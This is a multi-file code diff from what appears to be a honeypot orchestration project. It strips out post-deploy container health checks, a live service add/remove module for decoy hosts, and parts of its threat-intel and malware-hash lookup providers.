# -p decnet pins the compose project name. Without it, docker compose
@@ -494,8 +393,6 @@ def _compose_with_retry(
console.print(f"[red]{result.stderr.strip()}[/]")
log.error("docker compose %s failed after %d attempts: %s",
" ".join(args), retries, result.stderr.strip())
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
raise last_exc
@@ -665,7 +562,6 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
_sync_sessrec_sources(config)
_sync_auth_helper_sources(config)
_sync_ntlmssp_sources(config)
_sync_caddy_modules(config)
compose_path = write_compose(config, COMPOSE_FILE)
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -1055,84 +951,8 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
)
raise
# Post-deploy verification: ``compose up -d`` returns 0 the moment
# containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
@_traced("engine.teardown_topology")

View File

@@ -1,673 +0,0 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
Real implementation lives in :mod:`decnet.engine.deployer`; we
import-and-delegate at call time to keep this module's import graph
clean (see module docstring above).
"""
from decnet.engine.deployer import _compose as _real_compose
if compose_file is None:
_real_compose(*args, env=env)
else:
_real_compose(*args, compose_file=compose_file, env=env)
def _topology_compose_path(topology_id: str) -> Path:
from decnet.engine.deployer import _topology_compose_path as _real_path
return _real_path(topology_id)
def _write_topology_compose(hydrated, path: Path) -> Path:
from decnet.topology.compose import write_topology_compose
return write_topology_compose(hydrated, path)
def _load_state():
from decnet.config import load_state as _real_load_state
return _real_load_state()
def _save_state(config, compose_path) -> None:
from decnet.config import save_state as _real_save_state
_real_save_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
from decnet.composer import write_compose as _real_write_compose
_real_write_compose(config, compose_path)
def _get_bus():
from decnet.bus.factory import get_bus
return get_bus()
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
shards = await repo.list_decky_shards()
for s in shards:
if s.get("decky_name") == decky_name:
return s.get("host_uuid")
return None
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
"""Re-push the host's full shard to its worker agent.
Uses the same code path as POST /swarm/deploy: load master state, filter
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
The agent regenerates compose and recreates only the changed containers.
Idempotent for unchanged deckies.
"""
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
state = _load_state()
if state is None:
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
return
config, _compose_path = state
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
if not host_deckies:
log.warning(
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
host_uuid,
)
return
filtered = config.model_copy(update={"deckies": host_deckies})
await dispatch_decnet_config(filtered, repo)
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
from decnet.engine.deployer import resync_agent_topology
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
if not hydrated.get("topology", {}).get("target_host_uuid"):
return # unihost topology — local compose is authoritative
await resync_agent_topology(repo, topology_id)
log = get_logger("engine.services_live")
DeckyKind = Literal["fleet", "topology"]
class ServiceMutationError(ValueError):
"""Raised for caller-correctable failures. The API layer dispatches on
subclass to produce 4xx codes; base class maps to 422.
"""
class ServiceNotFoundError(ServiceMutationError):
"""Decky or topology does not exist → 404."""
class ServiceConflictError(ServiceMutationError):
"""Idempotency violation (already on / not on) → 409."""
def _validate_service_for_per_decky(name: str) -> BaseService:
"""Return the registered service or raise ``ServiceMutationError``.
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
responder), not per-decky — we reject the per-decky add/remove
request rather than silently producing a no-op compose entry.
"""
try:
svc = get_service(name)
except KeyError as exc:
raise ServiceMutationError(f"unknown service {name!r}") from exc
if svc.fleet_singleton:
raise ServiceMutationError(
f"service {name!r} is fleet_singleton; not addable per-decky"
)
return svc
async def _publish(topic: str, payload: dict[str, Any]) -> None:
"""Best-effort bus publish — same shape as the canary planter's helper."""
try:
bus = _get_bus()
await bus.connect()
await bus.publish(topic, payload)
await bus.close()
except Exception as e: # noqa: BLE001
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path
async def _topology_decky(
repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
for d in hydrated["deckies"]:
cfg = d.get("decky_config") or {}
name = cfg.get("name") or d.get("name")
if name == decky_name:
return d
raise ServiceNotFoundError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)
async def _rerender_topology_compose(
repo: BaseRepository, topology_id: str,
) -> Path:
"""Re-hydrate + re-render the per-topology compose file.
Called after a successful DB update so future deploys reflect the
change; without this the file would still describe the old service
set and a subsequent ``up -d`` would resurrect the removed service.
"""
hydrated = await hydrate(repo, topology_id)
if hydrated is None: # pragma: no cover — narrow race
raise ServiceNotFoundError(
f"topology {topology_id!r} disappeared mid-mutation"
)
path = _topology_compose_path(topology_id)
_write_topology_compose(hydrated, path)
return path
async def _add_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
update: dict[str, Any] = {"services": services}
# If the caller supplied initial config, fold it into decky_config
# BEFORE compose regen so the first ``up`` materialises the env on
# the new container — no follow-up apply needed.
if initial_config:
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = initial_config
cfg_blob["service_config"] = sc
update["decky_config"] = cfg_blob
await repo.update_topology_decky(decky["uuid"], update)
compose_path = await _rerender_topology_compose(repo, topology_id)
if await _topology_is_agent_pinned(repo, topology_id):
# Agent-pinned: the master's local compose has nothing to up.
# Push the new hydrated blob to the worker.
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
# Run compose in a worker thread so the API event loop stays
# responsive — same pattern as engine/deployer.deploy_topology.
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return False
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
async def _remove_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
compose_path = _topology_compose_path(topology_id)
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
if not agent_pinned:
# Stop + rm before persisting + re-rendering so a half-completed
# mutation leaves the operator a clear state to retry from
# (container still running; DB still says service is on).
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await repo.update_topology_decky(decky["uuid"], {"services": services})
await _rerender_topology_compose(repo, topology_id)
if agent_pinned:
# Worker tears down the removed service when it diffs the
# incoming hydrated blob against its current state.
await _resync_agent_topology(repo, topology_id)
return services
# ---------------------------------------------------------- fleet path
def _fleet_state_or_raise() -> tuple[Any, Path]:
state = _load_state()
if state is None:
raise ServiceMutationError(
"no fleet state on disk — run `decnet up` first"
)
return state
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
for d in config.deckies:
if d.name == decky_name:
return d
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
async def _persist_fleet_change(
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
"""Persist the mutation to JSON state, compose file, and the DB row."""
config, _ = _load_state()
target = _fleet_find_decky(config, decky.name)
target.services = services
_save_state(config, compose_path)
_write_compose(config, compose_path)
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
# change without waiting for the reconciler.
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": services,
"decky_config": target.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
async def _add_fleet_service(
repo: BaseRepository,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
if initial_config:
# Same path as _update_fleet_service_config: stash the validated
# cfg on the decky model so the compose write picks it up.
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = initial_config
decky.service_config = sc
await _persist_fleet_change(repo, decky, services, compose_path)
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
# Master has no container for this decky — re-push the host's
# shard so the worker materialises the new service.
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _remove_fleet_service(
repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if not swarm_host_uuid:
# Local: stop+rm before persist so the operator has a clear retry
# state if compose fails halfway. Swarm: skip — the worker's compose
# will handle the removal when the redispatched config drops the
# service from the decky.
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await _persist_fleet_change(repo, decky, services, compose_path)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
return services
# ---------------------------------------------------------- public api
async def add_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
config: dict | None = None,
) -> list[str]:
"""Add *service_name* to a deployed decky.
Validates the service registry (rejects unknown / fleet_singleton
names) and the optional ``config`` against the service's schema,
persists the change, regenerates the compose file, runs
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
and publishes ``decky.<name>.service.added`` on the bus.
``config`` is the same dict shape PUT/POST .../config accepts; it's
coerced via ``BaseService.validate_cfg`` before any state write so
a 400-class failure leaves zero side-effects.
Returns the post-mutation services list.
"""
svc = _validate_service_for_per_decky(service_name)
initial_config = svc.validate_cfg(config) if config else {}
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _add_topology_service(
repo, topology_id, decky_name, service_name,
initial_config=initial_config,
)
elif decky_kind == "fleet":
services = await _add_fleet_service(
repo, decky_name, service_name,
initial_config=initial_config,
)
else: # pragma: no cover — Literal narrows
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.add decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services
async def update_service_config(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
cfg: dict,
apply: bool = False,
topology_id: Optional[str] = None,
) -> dict:
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
The submitted dict is validated against the service's
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
DB write, so a 400-class failure leaves zero side-effects.
``apply=False`` (Save): only the DB row + compose file are updated.
The running container keeps its old env.
``apply=True`` (Apply): same persistence, then a force-recreate of
``<decky>-<service>`` so the container picks
up the new env. Destructive: drops any
in-container session state on that service.
Returns the post-mutation validated cfg.
"""
svc = _validate_service_for_per_decky(service_name)
validated = svc.validate_cfg(cfg)
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
await _update_topology_service_config(
repo, topology_id, decky_name, service_name, validated, apply=apply,
)
elif decky_kind == "fleet":
await _update_fleet_service_config(
repo, decky_name, service_name, validated, apply=apply,
)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"service_config": validated,
"recreated": bool(apply),
},
)
log.info(
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
decky_name, topology_id, service_name, apply,
)
return validated
async def _update_topology_service_config(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
decky = await _topology_decky(repo, topology_id, decky_name)
if service_name not in (decky.get("services") or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = validated
cfg_blob["service_config"] = sc
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
compose_path = await _rerender_topology_compose(repo, topology_id)
if apply:
if await _topology_is_agent_pinned(repo, topology_id):
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def _update_fleet_service_config(
repo: BaseRepository,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
if service_name not in (decky.services or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = validated
decky.service_config = sc
_save_state(config, compose_path)
_write_compose(config, compose_path)
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": list(decky.services or []),
"decky_config": decky.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
if apply:
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
# Docker Compose tracks the previous container by ID. If that
# container was already removed (or renamed during a prior failed
# deploy), --force-recreate fails with "No such container". Pre-
# remove by name so Compose starts from a clean slate.
await anyio.to_thread.run_sync(
lambda: subprocess.run( # nosec B603 B607
["docker", "rm", "-f", target],
capture_output=True,
),
)
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def remove_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
) -> list[str]:
"""Remove *service_name* from a deployed decky.
Stops + removes the service container, persists the new services
list, re-renders the compose file (so the next ``up -d`` doesn't
bring it back), and publishes ``decky.<name>.service.removed``.
Returns the post-mutation services list.
"""
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _remove_topology_service(
repo, topology_id, decky_name, service_name,
)
elif decky_kind == "fleet":
services = await _remove_fleet_service(repo, decky_name, service_name)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.remove decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services

View File

@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
# updater / swarmctl subcommands (which never touch auth) can start without
# the master's JWT secret being present in the environment.
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
# a SWARM worker. The forwarder tails this file and ships lines over
@@ -114,11 +114,6 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
# Bind address for the master-side swarm controller. Loopback by default —
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
# swarmctl-host in /etc/decnet/decnet.ini.
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
# Ingester batching: how many log rows to accumulate per commit, and the
# max wait (ms) before flushing a partial batch. Larger batches reduce

View File

@@ -128,6 +128,8 @@ async def reconcile_once(
container_states = await asyncio.to_thread(
_collect_container_states, docker_client_factory,
)
docker_known = container_states is not None
json_names = {d.name for d in json_deckies}
# 1. INSERT: present in JSON, absent from DB.
@@ -136,7 +138,7 @@ async def reconcile_once(
continue
new_state = (
_aggregate_decky_state(d.name, list(d.services), container_states)
if container_states is not None else "running"
if docker_known else "running"
)
row_host = d.host_uuid or host_uuid
await repo.upsert_fleet_decky({
@@ -166,7 +168,7 @@ async def reconcile_once(
)
# 3. STATE: present in both, docker says something fresh.
if container_states is not None:
if docker_known:
for d in json_deckies:
existing = db_by_name.get(d.name)
if existing is None:

View File

@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
from decnet.geoip.lookup import Lookup
from decnet.geoip.paths import ensure_root
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
from decnet.geoip.rir.parse import Range, parse_file
from decnet.geoip.rir.parse import parse_file
logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
except Exception as exc:
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
ranges: list[Range] = []
ranges = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -17,6 +17,7 @@ later if operators report drift.
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -92,25 +93,12 @@ class AbuseIPDBProvider(IntelProvider):
data = payload.get("data") or {}
score = int(data.get("abuseConfidenceScore") or 0)
verdict = _score_to_verdict(score)
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
# int codes per report. Flatten the union across all recent
# reports so the IntelLifter sees the full activity profile,
# not just the most-recent report's categories. Sorted for
# determinism (matters for tests + for the bus payload diff).
categories: set[int] = set()
for report in data.get("reports") or []:
if not isinstance(report, dict):
continue
for cat in report.get("categories") or []:
if isinstance(cat, int):
categories.add(cat)
return IntelResult(
provider=self.name,
verdict=verdict,
column_updates={
"abuseipdb_score": score,
"abuseipdb_categories": sorted(categories),
"abuseipdb_raw": data,
"abuseipdb_raw": json.dumps(data),
"abuseipdb_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -78,33 +78,3 @@ class IntelProvider(ABC):
entire IP. Implementations should also respect
``self._semaphore`` to bound in-flight calls.
"""
class MalHashProvider(ABC):
"""Abstract bad-hash lookup provider.
Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
vs IP), different consumer (the email ingester at observation time,
not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
Concrete impls today:
* :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
Future impls (paid VirusTotal subscription, in-house allowlist) plug
in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
"""
name: str
@abstractmethod
async def is_known_bad(self, sha256: str) -> bool:
"""Return whether *sha256* is on this provider's bad-hash list.
MUST NOT raise — return ``False`` on any error (the caller is the
ingester, not a worker; an exception here would taint a totally
unrelated bus payload). The provider is responsible for logging
its own errors.
"""

View File

@@ -21,7 +21,7 @@ from __future__ import annotations
import os
from typing import List
from decnet.intel.base import IntelProvider, MalHashProvider
from decnet.intel.base import IntelProvider
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
@@ -37,40 +37,6 @@ def _provider_list() -> list[str]:
return [p.strip().lower() for p in raw.split(",") if p.strip()]
_mal_hash_singleton: MalHashProvider | None = None
_mal_hash_initialized: bool = False
def get_mal_hash_provider() -> MalHashProvider | None:
"""Return the configured malware-hash lookup provider singleton.
Sibling factory to :func:`get_intel_providers` — different keyspace
(file SHA-256 vs IP), different consumer (the email ingester at
observation time, not the IP-keyed intel-worker fan-out). Returns
``None`` only if intel is disabled wholesale; otherwise returns a
provider whose :meth:`is_known_bad` self-disables to a no-op when
``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
has to special-case "no provider configured."
"""
global _mal_hash_singleton, _mal_hash_initialized
if _mal_hash_initialized:
return _mal_hash_singleton
_mal_hash_initialized = True
if not _enabled():
_mal_hash_singleton = None
return None
from decnet.intel.mal_hash import MalwareBazaarProvider
_mal_hash_singleton = MalwareBazaarProvider()
return _mal_hash_singleton
def _reset_mal_hash_provider_for_testing() -> None:
"""Test hook — drop the singleton so the next call re-reads env."""
global _mal_hash_singleton, _mal_hash_initialized
_mal_hash_singleton = None
_mal_hash_initialized = False
def get_intel_providers() -> List[IntelProvider]:
"""Return the configured threat-intel providers.

View File

@@ -13,6 +13,7 @@ of attacker IPs map to a single network round-trip per refresh window.
"""
from __future__ import annotations
import json
import time
from datetime import datetime, timezone
from typing import Any, Optional
@@ -92,22 +93,16 @@ class FeodoProvider(IntelProvider):
verdict=None, # absence ≠ "benign", let other providers speak
column_updates={
"feodo_listed": False,
"feodo_malware_family": None,
"feodo_raw": {},
"feodo_raw": "{}",
"feodo_queried_at": datetime.now(timezone.utc),
},
)
family_obj = entry.get("malware")
family = (
family_obj if isinstance(family_obj, str) and family_obj else None
)
return IntelResult(
provider=self.name,
verdict="malicious",
column_updates={
"feodo_listed": True,
"feodo_malware_family": family,
"feodo_raw": entry,
"feodo_raw": json.dumps(entry),
"feodo_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -25,6 +25,7 @@ Status code semantics:
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -70,9 +71,7 @@ class GreyNoiseProvider(IntelProvider):
verdict="unknown",
column_updates={
"greynoise_classification": "unknown",
"greynoise_name": None,
"greynoise_tags": [],
"greynoise_raw": {"message": "not seen"},
"greynoise_raw": json.dumps({"message": "not seen"}),
"greynoise_queried_at": datetime.now(timezone.utc),
},
)
@@ -89,25 +88,12 @@ class GreyNoiseProvider(IntelProvider):
classification = (data.get("classification") or "unknown").lower()
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
# "Censys") but no behavioral tag list — the tag taxonomy is
# paid-tier only. Persist whatever we got; a future non-Community
# provider may populate ``greynoise_tags``.
name_obj = data.get("name")
name = name_obj if isinstance(name_obj, str) and name_obj else None
tags_obj = data.get("tags")
tags: list[str] = (
[t for t in tags_obj if isinstance(t, str)]
if isinstance(tags_obj, list) else []
)
return IntelResult(
provider=self.name,
verdict=verdict,
column_updates={
"greynoise_classification": classification,
"greynoise_name": name,
"greynoise_tags": tags,
"greynoise_raw": data,
"greynoise_raw": json.dumps(data),
"greynoise_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -1,195 +0,0 @@
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
shape, but operates on the SHA-256 keyspace instead of IPs and so
implements :class:`decnet.intel.base.MalHashProvider` rather than
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
the provider logs one warning at first refresh attempt and disables
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
without ever making a network call. The ingester treats that the same
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
bus payload (which is exactly what the predicate's ``is True`` check
does today, so the silent-no-op is behaviorally identical to "lane not
shipped yet").
"""
from __future__ import annotations
import csv
import io
import os
import time
import zipfile
from typing import Optional
